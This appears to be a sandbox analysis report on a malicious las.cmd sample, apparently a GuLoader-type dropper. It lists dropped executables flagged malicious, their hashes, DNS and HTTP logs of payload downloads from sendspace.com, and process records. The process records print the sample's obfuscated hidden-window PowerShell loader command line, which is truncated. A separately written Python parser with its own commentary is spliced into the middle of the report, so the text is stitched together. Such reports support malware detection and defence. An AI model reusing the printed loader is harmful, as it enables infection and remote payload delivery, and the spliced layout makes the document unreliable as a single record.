                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):6221
                                                                                                Entropy (8bit):3.7346591629728882
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:/lcEVwMLPr3C4U28gjo3ukvhkvklCywGmdjB5vlR/PSogZolDB5vl4/PSogZoh1:NSM33CxHgPkvhkvCCtNB5veHCB5vpHC
                                                                                                MD5:1FACD43FF248EA754B7A0FA447B3394E
                                                                                                SHA1:C6DFDEC4CA178B9BE53DC4F580786B6B7F32F9D2
                                                                                                SHA-256:A667DBB95AF4465BF788D9BA61CB3D44FB07F24A74871414B8A3AF1FBC7EA079
                                                                                                SHA-512:1231155F951C7A798C94800246474ED0BC21978DE72E021BE1391EDBC3B43B6B8B8CDB47AEE1F500C0A35F70C0A9D744609B7F621FFF8F0FB8436145B18BC3F8
                                                                                                Malicious:false
                                                                                                Preview:...................................FL..................F.".. ...-/.v.....^..D...z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....hj:.D.......D.......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.X.............................%..A.p.p.D.a.t.a...B.V.1......X....Roaming.@......CW.^.X............................Or..R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^.X............................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWP`..Windows.@......CW.^DWP`.............................W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^.X......Q...........
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):6221
                                                                                                Entropy (8bit):3.7346591629728882
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:/lcEVwMLPr3C4U28gjo3ukvhkvklCywGmdjB5vlR/PSogZolDB5vl4/PSogZoh1:NSM33CxHgPkvhkvCCtNB5veHCB5vpHC
                                                                                                MD5:1FACD43FF248EA754B7A0FA447B3394E
                                                                                                SHA1:C6DFDEC4CA178B9BE53DC4F580786B6B7F32F9D2
                                                                                                SHA-256:A667DBB95AF4465BF788D9BA61CB3D44FB07F24A74871414B8A3AF1FBC7EA079
                                                                                                SHA-512:1231155F951C7A798C94800246474ED0BC21978DE72E021BE1391EDBC3B43B6B8B8CDB47AEE1F500C0A35F70C0A9D744609B7F621FFF8F0FB8436145B18BC3F8
                                                                                                Malicious:false
                                                                                                Preview:...................................FL..................F.".. ...-/.v.....^..D...z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....hj:.D.......D.......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.X.............................%..A.p.p.D.a.t.a...B.V.1......X....Roaming.@......CW.^.X............................Or..R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^.X............................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWP`..Windows.@......CW.^DWP`.............................W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^.X......Q...........
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:MS Windows registry file, NT/2000 or above
                                                                                                Category:dropped
                                                                                                Size (bytes):1835008
                                                                                                Entropy (8bit):4.462932527061137
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:JIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uN2dwBCswSbn:6XD94+WlLZMM6YFHg+n
                                                                                                MD5:EBE9AC19CCCC47FFABE69664A5B60132
                                                                                                SHA1:B8261C103C84ACF3A328D4C2FD6ABDCB7ED4DD43
                                                                                                SHA-256:2BB267DB6CF4E0FE6372CA92678796BF0A6394BF4B9EA3B17235FCAF3AF13133
                                                                                                SHA-512:482C147E3F87118F946E2EF1D7EAE3583DD1E895432C414443F1A8C7289F8D9477EC3A282DD9D25BE26868B2DA2EEEF36049CFF2FFA031886B45AADA32403841
                                                                                                Malicious:false
                                                                                                Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmJ\..D................................................................................................................................................................................................................................................................................................................................................k..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):41472
                                                                                                Entropy (8bit):4.812812916305451
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:sPpOlINgIP79gB3pzhTkR6ETphjuuVnSk8YXiGHgrHL6Zh9oWIkUinksTyCOeM:sEl9bbSVh7VWYOzL49oWPksTyIM
                                                                                                MD5:E11C7C303771F18E1542B2C742879D3F
                                                                                                SHA1:C37CBCA2FD214FB68A62BACAC27D54C660DF91ED
                                                                                                SHA-256:4770F9E9EF9F85A0E5DED7D6EC4BF56EEF45C831EF623C3DCE84EFFBA40ADDAC
                                                                                                SHA-512:D9A274D422793A73E8E8BC4745882C7AF0CE34341A62385DA2C026BAB58AAAF6E49044CEF8FFEF68EF24FDD95DEBCD16FA4E79598D29885D6E4A9707B6884A8E
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
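The dropped-file records above are one flattened `Key:Value` line per field, each record opening with the `Process:` that wrote the file. What an analyst wants out of them is not the raw listing but the relationships: which processes wrote PE images (here `wab.exe`, a Windows Mail binary, which has no business emitting executables), and which hashes the sandbox flagged malicious. The following Python is an added example, not part of the Joe Sandbox report or its tooling; it parses three records excerpted from the listing above (previews trimmed to their first bytes) and produces those summaries. The field names and the `MZ` preview check are taken from the report itself; the helper names are my own.

```python
"""
Parser for the flattened dropped-file records of a Joe Sandbox report as they
appear in the listing above: "Key:Value" lines, one record per "Process:" line.
Turns the listing into IOC-style summaries instead of eyeballed hashes.
"""
import re
from collections import defaultdict

# Key runs up to the FIRST colon, so values such as "C:\..." and "SSDEEP:192:..."
# keep their own colons intact.
FIELD_RE = re.compile(r"^\s*([A-Za-z0-9 ()-]+?):(.*)$")

# Three records excerpted from the listing above (previews trimmed).
SAMPLE = r"""
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Program Files (x86)\Windows Mail\wab.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):182272
Entropy (8bit):6.486621682985029
SHA-256:B217D6FA0ACE851216ADF5F3CB58A8A03ABFFC15EB1DC6C1F5B11FC99F069BA4
Malicious:true
Preview:MZ......................@..............!..L.!This program cannot be run in DOS mode....
Process:C:\Program Files (x86)\Windows Mail\wab.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):41472
Entropy (8bit):4.812812916305451
SHA-256:4770F9E9EF9F85A0E5DED7D6EC4BF56EEF45C831EF623C3DCE84EFFBA40ADDAC
Malicious:true
Preview:MZ......................@..............!..L.!This program cannot be run in DOS mode....
"""


def parse_records(text):
    """Split the flattened listing into one dict per dropped file."""
    records, cur = [], None
    for line in text.splitlines():
        m = FIELD_RE.match(line)
        if not m:
            continue
        key, val = m.group(1).strip(), m.group(2).strip()
        if key == "Process":          # every record opens with the writing process
            cur = {}
            records.append(cur)
        if cur is not None:
            cur[key] = val
    return records


def size_bytes(rec):
    # the static section writes sizes as 6'478; strip the thousands separator
    return int(rec.get("Size (bytes)", "0").replace("'", ""))


def malicious_pe_drops(records):
    """(process, sha256, size) for files flagged malicious that carry a PE header."""
    return [(r["Process"], r.get("SHA-256", ""), size_bytes(r))
            for r in records
            if r.get("Malicious") == "true" and r.get("Preview", "").startswith("MZ")]


def pe_writers(records):
    """Processes that wrote any PE image; a mail client doing so is the injection tell."""
    return sorted({r["Process"] for r in records if r.get("Preview", "").startswith("MZ")})


def hashes_by_process(records):
    """SHA-256 of every dropped file, grouped by the process that wrote it."""
    out = defaultdict(list)
    for r in records:
        out[r["Process"]].append(r.get("SHA-256", ""))
    return dict(out)


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for proc, sha, size in malicious_pe_drops(recs):
        print(f"{proc} wrote malicious PE {sha} ({size} bytes)")
    print("PE writers:", pe_writers(recs))
```

Feed it the full listing and `pe_writers` is the first thing to read: a legitimate signed host binary appearing there is the process that GuLoader hollowed or injected into, and its SHA-256 list is what goes into the blocklist.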
                                                                                                File type:ASCII text, with very long lines (6478), with no line terminators
                                                                                                Entropy (8bit):5.246900424773366
                                                                                                TrID:
                                                                                                  File name:las.cmd
                                                                                                  File size:6'478 bytes
                                                                                                  MD5:f96b390af9be44e21ffec109cb107462
                                                                                                  SHA1:716dda50fc30581e587c0a3d8c65d45aefbfec14
                                                                                                  SHA256:c73db3a4bf51b48059eef2a5003feafc43dc7e93bf8c70fb51a0423c212d85a7
                                                                                                  SHA512:09fdcbc4b6153d37889c4b91f9ce996b5b1131ca50db1f3749420860e2731da915babc6a379e64b762c2cb2f4bf399760dae5b48adffba8ca95ce44b71fdd649
                                                                                                  SSDEEP:96:vNL+Uex09u1ayG4ZJSpIOzmJOH2BLE6BNMi9SioPrHu1v7Pn/VKdgoZcLA4sKLUd:vNHbyG4ZJeJzmJYsqju1v7Poqo7zKwd
                                                                                                  TLSH:0ED16E4B860DBA4D01EB7B0C718E46524DE8C73D892EC55E7D0B56C320CDE2932BD3A1
                                                                                                  File Content Preview:start /min powershell.exe -windowstyle hidden "$sublicense = 1;$Solbatteri='Sub';$Solbatteri+='strin';$Solbatteri+='g';Function Udvindende($Twistende){$Lastelinie=$Twistende.Length-$sublicense;For($Firblok=5;$Firblok -lt $Lastelinie;$Firblok+=6){$lunelsen
                                                                                                  Icon Hash:9686878b929a9886
                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  May 23, 2024 21:09:14.291155100 CEST49738443192.168.2.4172.67.170.105
                                                                                                  May 23, 2024 21:09:14.291177034 CEST44349738172.67.170.105192.168.2.4
                                                                                                  May 23, 2024 21:09:14.359184980 CEST49739443192.168.2.469.31.136.57
                                                                                                  May 23, 2024 21:09:14.359217882 CEST4434973969.31.136.57192.168.2.4
                                                                                                  May 23, 2024 21:09:14.359400034 CEST49739443192.168.2.469.31.136.57
                                                                                                  May 23, 2024 21:09:14.359766006 CEST49739443192.168.2.469.31.136.57
                                                                                                  May 23, 2024 21:09:14.359782934 CEST4434973969.31.136.57192.168.2.4
                                                                                                  May 23, 2024 21:09:15.065455914 CEST4434973969.31.136.57192.168.2.4
                                                                                                  May 23, 2024 21:09:15.065553904 CEST49739443192.168.2.469.31.136.57
                                                                                                  May 23, 2024 21:09:15.069479942 CEST49739443192.168.2.469.31.136.57
                                                                                                  May 23, 2024 21:09:15.069492102 CEST4434973969.31.136.57192.168.2.4
                                                                                                  May 23, 2024 21:09:15.069740057 CEST4434973969.31.136.57192.168.2.4
                                                                                                  May 23, 2024 21:09:15.069873095 CEST49739443192.168.2.469.31.136.57
                                                                                                  May 23, 2024 21:09:15.070235014 CEST49739443192.168.2.469.31.136.57
                                                                                                  May 23, 2024 21:09:15.114495993 CEST4434973969.31.136.57192.168.2.4
                                                                                                  May 23, 2024 21:09:15.401386976 CEST4434973969.31.136.57192.168.2.4
                                                                                                  May 23, 2024 21:09:15.401416063 CEST4434973969.31.136.57192.168.2.4
                                                                                                  May 23, 2024 21:09:15.401432991 CEST4434973969.31.136.57192.168.2.4
                                                                                                  May 23, 2024 21:09:15.402503967 CEST49739443192.168.2.469.31.136.57
                                                                                                  May 23, 2024 21:09:15.402520895 CEST4434973969.31.136.57192.168.2.4
                                                                                                  May 23, 2024 21:09:15.402952909 CEST49739443192.168.2.469.31.136.57
                                                                                                  May 23, 2024 21:09:15.428036928 CEST4434973969.31.136.57192.168.2.4
                                                                                                  May 23, 2024 21:09:15.428057909 CEST4434973969.31.136.57192.168.2.4
                                                                                                  May 23, 2024 21:09:15.428180933 CEST49739443192.168.2.469.31.136.57
                                                                                                  May 23, 2024 21:09:15.428194046 CEST4434973969.31.136.57192.168.2.4
                                                                                                  May 23, 2024 21:09:15.429282904 CEST49739443192.168.2.469.31.136.57
                                                                                                  May 23, 2024 21:09:15.492178917 CEST4434973969.31.136.57192.168.2.4
                                                                                                  May 23, 2024 21:09:15.492199898 CEST4434973969.31.136.57192.168.2.4
                                                                                                  May 23, 2024 21:09:15.492316008 CEST49739443192.168.2.469.31.136.57
                                                                                                  May 23, 2024 21:09:15.492330074 CEST4434973969.31.136.57192.168.2.4
                                                                                                  May 23, 2024 21:09:15.492377996 CEST49739443192.168.2.469.31.136.57
                                                                                                  May 23, 2024 21:09:15.512284040 CEST4434973969.31.136.57192.168.2.4
                                                                                                  May 23, 2024 21:09:15.512301922 CEST4434973969.31.136.57192.168.2.4
                                                                                                  May 23, 2024 21:09:15.512381077 CEST49739443192.168.2.469.31.136.57
                                                                                                  May 23, 2024 21:09:15.512388945 CEST4434973969.31.136.57192.168.2.4
                                                                                                  May 23, 2024 21:09:15.512432098 CEST49739443192.168.2.469.31.136.57
                                                                                                  May 23, 2024 21:09:15.527154922 CEST4434973969.31.136.57192.168.2.4
                                                                                                  May 23, 2024 21:09:15.527173996 CEST4434973969.31.136.57192.168.2.4
                                                                                                  May 23, 2024 21:09:15.527255058 CEST49739443192.168.2.469.31.136.57
                                                                                                  May 23, 2024 21:09:15.527264118 CEST4434973969.31.136.57192.168.2.4
                                                                                                  May 23, 2024 21:09:15.527304888 CEST49739443192.168.2.469.31.136.57
                                                                                                  May 23, 2024 21:09:15.554120064 CEST4434973969.31.136.57192.168.2.4
                                                                                                  May 23, 2024 21:09:15.554137945 CEST4434973969.31.136.57192.168.2.4
                                                                                                  May 23, 2024 21:09:15.554231882 CEST49739443192.168.2.469.31.136.57
                                                                                                  May 23, 2024 21:09:15.554243088 CEST4434973969.31.136.57192.168.2.4
                                                                                                  May 23, 2024 21:09:15.554287910 CEST49739443192.168.2.469.31.136.57
                                                                                                  May 23, 2024 21:09:15.560230970 CEST4434973969.31.136.57192.168.2.4
                                                                                                  May 23, 2024 21:09:15.560327053 CEST49739443192.168.2.469.31.136.57
                                                                                                  May 23, 2024 21:09:15.560337067 CEST4434973969.31.136.57192.168.2.4
                                                                                                  May 23, 2024 21:09:15.560384035 CEST49739443192.168.2.469.31.136.57
                                                                                                  May 23, 2024 21:09:15.560672045 CEST49739443192.168.2.469.31.136.57
                                                                                                  May 23, 2024 21:09:15.560703039 CEST4434973969.31.136.57192.168.2.4
                                                                                                  May 23, 2024 21:09:15.560755968 CEST49739443192.168.2.469.31.136.57
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 23, 2024 21:08:47.500967026 CEST | 54303 | 53 | 192.168.2.4 | 1.1.1.1
May 23, 2024 21:08:47.513350964 CEST | 53 | 54303 | 1.1.1.1 | 192.168.2.4
May 23, 2024 21:08:48.351973057 CEST | 56072 | 53 | 192.168.2.4 | 1.1.1.1
May 23, 2024 21:08:48.406651974 CEST | 53 | 56072 | 1.1.1.1 | 192.168.2.4
May 23, 2024 21:09:14.295062065 CEST | 62204 | 53 | 192.168.2.4 | 1.1.1.1
May 23, 2024 21:09:14.355365992 CEST | 53 | 62204 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
May 23, 2024 21:08:47.500967026 CEST | 192.168.2.4 | 1.1.1.1 | 0xec0 | Standard query (0) | www.sendspace.com | A (IP address) | IN (0x0001) | false
May 23, 2024 21:08:48.351973057 CEST | 192.168.2.4 | 1.1.1.1 | 0x8c06 | Standard query (0) | fs03n2.sendspace.com | A (IP address) | IN (0x0001) | false
May 23, 2024 21:09:14.295062065 CEST | 192.168.2.4 | 1.1.1.1 | 0xa01a | Standard query (0) | fs13n4.sendspace.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
May 23, 2024 21:08:47.513350964 CEST | 1.1.1.1 | 192.168.2.4 | 0xec0 | No error (0) | www.sendspace.com | | 172.67.170.105 | A (IP address) | IN (0x0001) | false
May 23, 2024 21:08:47.513350964 CEST | 1.1.1.1 | 192.168.2.4 | 0xec0 | No error (0) | www.sendspace.com | | 104.21.28.80 | A (IP address) | IN (0x0001) | false
May 23, 2024 21:08:48.406651974 CEST | 1.1.1.1 | 192.168.2.4 | 0x8c06 | No error (0) | fs03n2.sendspace.com | | 69.31.136.17 | A (IP address) | IN (0x0001) | false
May 23, 2024 21:09:14.355365992 CEST | 1.1.1.1 | 192.168.2.4 | 0xa01a | No error (0) | fs13n4.sendspace.com | | 69.31.136.57 | A (IP address) | IN (0x0001) | false
• www.sendspace.com
• fs03n2.sendspace.com
• fs13n4.sendspace.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 172.67.170.105 | 443 | 7596 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-23 19:08:48 UTC | 174 | OUT | GET /pro/dl/wlorhs HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: www.sendspace.com
Connection: Keep-Alive
2024-05-23 19:08:48 UTC | 942 | IN | HTTP/1.1 301 Moved Permanently
Date: Thu, 23 May 2024 19:08:48 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: SID=agl7gcfidedl89v3md884jkcv1; path=/; domain=.sendspace.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: https://fs03n2.sendspace.com/dlpro/90cd9178b57ca9e755cc53ffd63d0a44/664f9440/wlorhs/Undertaker.pcx
Vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F1VdPdH%2Bcf%2Fd5ZmWnp8I9OZdnM4ZuR3wpk79m6pS022rohC7TM1Xh8aJN4to4BsthRmJnGwk6IhYRkl931cqbeHma4PPgIyr%2BxwlGv4Upmx7nu6NbBN3JTxrGEBdoJLfU2ZACg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 88875630ff708c1e-EWR
alt-svc: h3=":443"; ma=86400
2024-05-23 19:08:48 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49731 | 69.31.136.17 | 443 | 7596 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-23 19:08:49 UTC | 233 | OUT | GET /dlpro/90cd9178b57ca9e755cc53ffd63d0a44/664f9440/wlorhs/Undertaker.pcx HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: fs03n2.sendspace.com
Connection: Keep-Alive
2024-05-23 19:08:49 UTC | 499 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 23 May 2024 19:08:49 GMT
Content-Type: application/octet-stream
Content-Length: 441484
Last-Modified: Fri, 17 May 2024 15:05:46 GMT
Connection: close
Set-Cookie: SID=5ms0jssd7vh4dfc0pn75bs45h1; path=/; domain=.sendspace.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Disposition: attachment;filename="Undertaker.pcx"
ETag: "6647724a-6bc8c"
Accept-Ranges: bytes


                                                                                                  Session ID:2
                                                                                                  Source IP:192.168.2.4
                                                                                                  Source Port:49738
                                                                                                  Destination IP:172.67.170.105
                                                                                                  Destination Port:443
                                                                                                  PID:7244
                                                                                                  Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                  Timestamp:2024-05-23 19:09:13 UTC
                                                                                                  Bytes transferred:175
                                                                                                  Direction:OUT
                                                                                                  Data:
                                                                                                  GET /pro/dl/g1h76h HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                  Host: www.sendspace.com
                                                                                                  Cache-Control: no-cache
                                                                                                  Timestamp:2024-05-23 19:09:14 UTC
                                                                                                  Bytes transferred:957
                                                                                                  Direction:IN
                                                                                                  Data:
                                                                                                  HTTP/1.1 301 Moved Permanently
                                                                                                  Date: Thu, 23 May 2024 19:09:14 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  Set-Cookie: SID=7snc8sd5begfi8v3gnpjgpo9j3; path=/; domain=.sendspace.com
                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                  Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                  Pragma: no-cache
                                                                                                  Location: https://fs13n4.sendspace.com/dlpro/525cc5bd045f79d6fc570e988ce77b0f/664f945a/g1h76h/ZzDmwvhJScPuYqxiGHOFrHH77.bin
                                                                                                  Vary: Accept-Encoding
                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BPw3YxTkJ%2FCIz1hG%2FfVS8W3ggG0knfNtsS4eneT0tajbq9Sk4HditUT7DJxj85Vz7QvKZDG7uD6wOcOf9Nr1KvTcIyqvG14YNnw4Ix5LuOLzJlZnBmfsmI%2F20jrzpqFOnx0BAQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 888756d24a2e4356-EWR
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  Timestamp:2024-05-23 19:09:14 UTC
                                                                                                  Bytes transferred:5
                                                                                                  Direction:IN
                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                  Data Ascii: 0


                                                                                                  Session ID:3
                                                                                                  Source IP:192.168.2.4
                                                                                                  Source Port:49739
                                                                                                  Destination IP:69.31.136.57
                                                                                                  Destination Port:443
                                                                                                  PID:7244
                                                                                                  Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                  Timestamp:2024-05-23 19:09:15 UTC
                                                                                                  Bytes transferred:313
                                                                                                  Direction:OUT
                                                                                                  Data:
                                                                                                  GET /dlpro/525cc5bd045f79d6fc570e988ce77b0f/664f945a/g1h76h/ZzDmwvhJScPuYqxiGHOFrHH77.bin HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                  Cache-Control: no-cache
                                                                                                  Host: fs13n4.sendspace.com
                                                                                                  Connection: Keep-Alive
                                                                                                  Cookie: SID=7snc8sd5begfi8v3gnpjgpo9j3
                                                                                                  Timestamp:2024-05-23 19:09:15 UTC
                                                                                                  Bytes transferred:439
                                                                                                  Direction:IN
                                                                                                  Data:
                                                                                                  HTTP/1.1 200 OK
                                                                                                  Server: nginx
                                                                                                  Date: Thu, 23 May 2024 19:09:15 GMT
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Length: 106048
                                                                                                  Last-Modified: Fri, 17 May 2024 15:04:46 GMT
                                                                                                  Connection: close
                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                  Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                  Content-Disposition: attachment;filename="ZzDmwvhJScPuYqxiGHOFrHH77.bin"
                                                                                                  ETag: "6647720e-19e40"
                                                                                                  Accept-Ranges: bytes


                                                                                                  Target ID:0
                                                                                                  Start time:15:08:43
                                                                                                  Start date:23/05/2024
                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\las.cmd" "
                                                                                                  Imagebase:0x7ff68faa0000
                                                                                                  File size:289'792 bytes
                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:1
                                                                                                  Start time:15:08:43
                                                                                                  Start date:23/05/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:2
                                                                                                  Start time:15:08:44
                                                                                                  Start date:23/05/2024
                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:powershell.exe -windowstyle hidden "$sublicense = 1;$Solbatteri='Sub';$Solbatteri+='strin';$Solbatteri+='g';Function Udvindende($Twistende){$Lastelinie=$Twistende.Length-$sublicense;For($Firblok=5;$Firblok -lt $Lastelinie;$Firblok+=6){$lunelsen+=$Twistende.$Solbatteri.Invoke( $Firblok, $sublicense);}$lunelsen;}function Unschool($Squimmidge){. ($Jetmotoren) ($Squimmidge);}$Pedicures=Udvindende 'TestiMMiljloInterzShel iMil.elCol.clBifigaOvers/Stepp5Ne kw. A er0Ego r Konku(IndskWin vii.ernin kaksdTrilloByggewKoreisDu,st O,debN XenoTPrisl Matem1Unher0 Inla.Pr,fa0Samme;Ote.t BrnesW ,isciAureanSenso6Under4glyce; ihra NotatxSoci 6 F.ap4Terzi; Honn Gyro.rHoultv S,ns:spell1Oli.t2Indbl1s end.Capit0Kratt)C,oic genetGRysteePremac,mudskNonuboDevis/ S or2Misdd0.dgan1Misha0Stjyd0Velst1Haa d0 S,ip1.ndig NoradFOr iei nergrSe ereDy.tbfFluoroIndpaxSludr/Mod.r1spu.r2 Smut1Ugl,d.Ingra0Se ue ';$Privileged=Udvindende 'Ob,diUA.dsesMsk,ne ,arar Matr-Jord.AUterog reeseBe trnTe.tatDis i ';$Sprngningers=Udvindende 'juncah,ripyt Sfyrtsupr.pFa.lesF,rpo:Prunt/Argum/ D.scwElskowMumifw hers.DollasacidoeSemilnmisled lyndsImparpKendea unnic ugeaeThist.DokhacOmnipo ugtim.allw/Curetp O firStipuoGl zi/Guerid SkablBa st/JogurwIntralVitr oShirtrSamfuhSlvsmsSk,dk ';$Forlovede=Udvindende 'Rel,a>R,kla ';$Jetmotoren=Udvindende 'Cor,ii KliseCuchix Kyse ';$Tendrilous='Handleformerne';$Veta13 = Udvindende 'SkytseCentrcAllithUnguio Tu.i ,ndka%mbleraMonocp IntepForstd FiliaHikketTeg,vaya.ne% Ou.w\CytopFVetere,likvtSa.tltA.riglMelleeJakob.TugteHToilfaUn,ernPuebl Folk&Nonpa&L.dar Xx.ndeDeamic RegihIncanoRhila Betint.agua ';Unschool (Udvindende 'Flo,r$CyprigLevnelSluk oUns ib In.laCompulR,tsf:NedgrSovertaSjofllUdsteuSorbet Druke waver.uadresnil,r Samo=Hneky(YderzcNain m Compd arga Helt/HetercDekup ,ylli$AskebVDusineFlowetHal,taFar,e1 Akva3Tjrne) aktf ');Unschool (Udvindende ' Ustk$Teh ng 
